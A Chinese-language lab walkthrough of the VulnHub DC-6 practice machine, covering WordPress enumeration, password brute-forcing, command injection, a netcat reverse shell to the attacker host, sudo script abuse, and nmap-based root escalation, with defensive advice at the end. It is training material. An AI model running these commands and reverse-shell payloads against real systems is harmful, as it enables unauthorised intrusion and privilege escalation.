VulnHub靶机 DC-6 打靶实战 渗透详细过程
字数 1474 2025-08-19 12:42:26
VulnHub靶机DC-6渗透测试详细教学文档
一、靶机概述
DC-6是VulnHub上提供的一个专为渗透测试练习设计的靶机,基于WordPress CMS构建,包含多种漏洞和提权路径。
二、环境准备
- 靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/
- 将靶机导入虚拟机软件(如VMware或VirtualBox)
- 确保攻击机(Kali Linux)与靶机在同一网络环境中
三、渗透测试流程
1. 主机发现
使用以下命令识别靶机IP地址:
arp-scan -l
# 或
nmap -sn 192.168.0.0/24
2. 端口扫描与服务识别
nmap -p- 192.168.0.106
nmap -p80 -sV -A 192.168.0.106
扫描结果应显示开放22(SSH)和80(HTTP)端口。
3. Web应用信息收集
whatweb http://192.168.0.106
发现使用WordPress CMS,需要配置本地hosts解析:
echo "192.168.0.106 wordy" >> /etc/hosts
4. WordPress枚举
使用WPScan枚举用户:
wpscan --url http://wordy -e u
成功枚举出五位用户信息,保存到user.txt文件中。
5. 目录爆破
dirsearch -u http://wordy -i 200
发现登录界面/wp-login.php。
6. 密码爆破
根据作者提示,从rockyou.txt中筛选包含"k01"的密码:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy -U user.txt -P passwords.txt
成功爆破出凭据:
- 用户名:mark
- 密码:helpdesk01
7. 获取初始访问
- 使用获取的凭据登录WordPress后台
- 发现"Activity monitor"插件存在命令注入漏洞
- 测试命令注入:
127.0.0.1 | ls - 建立反向shell:
- Kali监听:
nc -lvvp 8888 - 靶机执行(通过修改请求数据包绕过长度限制):
127.0.0.1 | nc -e /bin/bash 192.168.0.107 8888
- Kali监听:
8. 权限提升路径
8.1 信息收集
- 获取稳定shell:
python -c "import pty;pty.spawn('/bin/bash')" - 检查用户目录:
- /home/jens/backups.sh - 网站备份脚本
- /home/mark/stuff/things-to-do.txt - 包含graham用户的密码
8.2 横向移动
使用graham凭据通过SSH登录:
ssh graham@192.168.0.106
8.3 提权至jens用户
- 检查sudo权限:
sudo -l - 发现可以jens用户身份执行/home/jens/backups.sh
- 修改脚本添加反向shell:
echo "nc -e /bin/bash 192.168.0.107 6666" >> backups.sh sudo -u jens /home/jens/backups.sh - Kali监听6666端口获取jens shell
8.4 提权至root
- 再次检查sudo权限:
sudo -l - 发现jens可以root权限执行nmap
- 创建提权脚本:
echo 'os.execute("/bin/sh")' > root_shell.sh sudo nmap --script=root_shell.sh - 成功获取root权限
四、关键知识点总结
- 主机发现:使用arp-scan或nmap进行网络扫描
- 服务枚举:nmap的-sV和-A参数获取详细服务信息
- WordPress枚举:WPScan工具的用户枚举功能
- 密码爆破:合理利用字典和过滤技术提高效率
- 命令注入:识别和利用Web应用中的命令注入漏洞
- 反向shell:多种建立反向shell的方法
- 权限提升路径:
- 通过信息泄露获取新凭据
- 利用sudo权限执行特定脚本
- 滥用具有SUID权限或特殊sudo权限的应用程序(如nmap)
五、防御建议
-
WordPress安全:
- 限制用户枚举功能
- 使用强密码策略
- 及时更新插件和核心
-
系统安全:
- 限制sudo权限
- 避免使用危险程序的特殊权限
- 定期检查SUID/SGID文件
-
开发安全:
- 避免命令注入漏洞
- 对用户输入进行严格过滤
- 最小权限原则
六、工具清单
- arp-scan - 主机发现
- nmap - 端口扫描和服务识别
- whatweb - Web应用指纹识别
- wpscan - WordPress漏洞扫描
- dirsearch - 目录爆破
- netcat - 建立反向shell
- sudo/nmap - 提权工具
通过本实验,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别是WordPress系统的安全评估和Linux系统的提权技术。